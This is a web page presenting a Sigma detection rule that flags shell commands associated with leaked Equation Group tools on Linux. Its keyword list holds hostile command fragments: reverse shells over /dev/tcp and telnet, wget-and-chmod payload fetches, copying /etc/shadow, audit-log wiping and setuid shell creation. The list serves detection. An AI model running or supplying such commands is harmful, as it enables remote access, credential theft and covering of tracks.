Equation Group Indicators

calendar Feb 1, 2023 · attack.execution attack.g0020 attack.t1059.004  ·
Share on: linkedin copy

Detects suspicious shell commands used in various Equation Group scripts and tools

Sigma rule (View on GitHub)

 1title: Equation Group Indicators
 2id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
 3status: test
 4description: Detects suspicious shell commands used in various Equation Group scripts and tools
 5references:
 6    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
 7author: Florian Roth (Nextron Systems)
 8date: 2017/04/09
 9modified: 2021/11/27
10tags:
11    - attack.execution
12    - attack.g0020
13    - attack.t1059.004
14logsource:
15    product: linux
16detection:
17    keywords:
18        # evolvingstrategy, elgingamble, estesfox
19        - 'chown root*chmod 4777 '
20        - 'cp /bin/sh .;chown'
21        # tmpwatch
22        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
23        - 'chown root:root /tmp/.scsi/dev/bin/'
24        # estesfox
25        - 'chown root:root x;'
26        # ratload
27        - '/bin/telnet locip locport < /dev/console | /bin/sh'
28        - '/tmp/ratload'
29        # ewok
30        - 'ewok -t '
31        # xspy
32        - 'xspy -display '
33        # elatedmonkey
34        - 'cat > /dev/tcp/127.0.0.1/80 <<END'
35        # ftshell
36        - 'rm -f /current/tmp/ftshell.latest'
37        # ghost
38        - 'ghost_* -v '
39        # morerats client
40        - ' --wipe > /dev/null'
41        # noclient
42        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
43        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
44        # auditcleaner
45        - '> /var/log/audit/audit.log; rm -f .'
46        - 'cp /var/log/audit/audit.log .tmp'
47        # reverse shell
48        - 'sh >/dev/tcp/* <&1 2>&1'
49        # packrat
50        - 'ncat -vv -l -p * <'
51        - 'nc -vv -l -p * <'
52        # empty bowl
53        - '< /dev/console | uudecode && uncompress'
54        - 'sendmail -osendmail;chmod +x sendmail'
55        # echowrecker
56        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
57        # dubmoat
58        - 'chmod 666 /var/run/utmp~'
59        # poptop
60        - 'chmod 700 nscd crond'
61        # abopscript
62        - 'cp /etc/shadow /tmp/.'
63        # ys
64        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'
65        # jacktelnet
66        - 'chmod 700 jp&&netstat -an|grep'
67        # others
68        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
69        - 'chmod 700 crond'
70        - 'wget http*; chmod +x /tmp/sendmail'
71        - 'chmod 700 fp sendmail pt'
72        - 'chmod 755 /usr/vmsys/bin/pipe'
73        - 'chmod -R 755 /usr/vmsys'
74        - 'chmod 755 $opbin/*tunnel'
75        - 'chmod 700 sendmail'
76        - 'chmod 0700 sendmail'
77        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'
78        - '&& telnet * 2>&1 </dev/console'
79    condition: keywords
80falsepositives:
81    - Unknown
82level: high

References

Related rules

to-top